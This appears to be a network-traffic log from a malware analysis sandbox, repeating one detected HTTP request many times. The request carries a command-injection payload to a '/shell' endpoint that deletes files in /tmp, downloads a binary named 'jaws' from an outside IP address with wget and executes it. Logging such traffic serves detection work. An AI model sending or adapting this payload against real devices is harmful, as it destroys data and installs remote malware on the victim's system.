      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
